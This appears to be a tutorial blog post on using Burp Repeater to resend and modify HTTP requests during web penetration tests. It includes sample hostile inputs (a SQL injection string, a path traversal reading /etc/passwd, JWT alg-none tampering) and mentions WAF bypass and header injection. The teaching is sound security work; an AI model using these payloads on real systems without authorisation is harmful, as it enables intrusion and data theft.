While automated scanners are fast, Burp Repeater remains the weapon of choice for fine-grained analysis.

It lets you inspect, craft, and reissue requests in isolation — ideal for identifying edge-case vulnerabilities.

This article focuses on how to effectively use Repeater for manual payload analysis during a web penetration test.

1. What is Repeater?

Burp Repeater is a tool that lets you manually modify and resend HTTP requests to a target server.

Each request/response pair is preserved, enabling precise observation of changes in behavior.

Perfect for:

  • Parameter tampering
  • Authentication bypass testing
  • Input validation exploration
  • Confirming false positives from scanners

2. Sending Requests to Repeater

Use the Burp proxy or sitemap → right-click → "Send to Repeater"

Alternatively, use keyboard shortcut: Ctrl+R (Windows/Linux) or Cmd+R (macOS)

Each tab in Repeater is independent, with its own history and diffs.

3. Constructing & Testing Payloads

Consider a GET request with a q parameter:

GET /search?q=test HTTP/1.1
Host: app.example.com

Now try:

  • SQLi: q=' OR '1'='1
  • XSS: q=
  • LFI: q=../../../../etc/passwd

Observe the differences in:

  • HTTP status code
  • Response body structure
  • Error messages
  • Response time (for time-based payloads)

4. Binary and Encoded Payloads

Use Repeater + Decoder together:

  • Base64 / URL-encoded payloads
  • JSON body manipulation
  • JWT tampering

Example (JWT):

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6...

Manually modify the alg to none or brute-force secrets.

5. Comparing Responses

Use the "Compare" function to visually diff response pairs:

  • Highlight differences in HTML output
  • Identify subtle changes in headers (e.g. Set-Cookie, Location, Content-Length)

Useful for bypass attempts, privilege escalation detection, and race condition exploration.

6. Advanced Repeater Use Cases

  • Bypass WAFs with encoding obfuscation
  • Custom headers injection (X-Original-URL, X-Forwarded-For)
  • CSRF token replay with static/dynamic values
  • State manipulation using intercepted cookies

Combine with Burp’s Cookie Jar and Session Handling Rules for persistence across attempts.

Final Notes

Burp Repeater is not just a testing tool — it’s an observation instrument.

Mastering it trains your eye to spot what scanners miss: logic flaws, business logic bugs, subtle misconfigurations.

Coming up:

  • Burp Intruder for fuzzing inputs at scale
  • Practical bypass techniques for input filters
  • Building custom payload libraries for targeted testing

Precision matters. Test with intent. Interpret with clarity.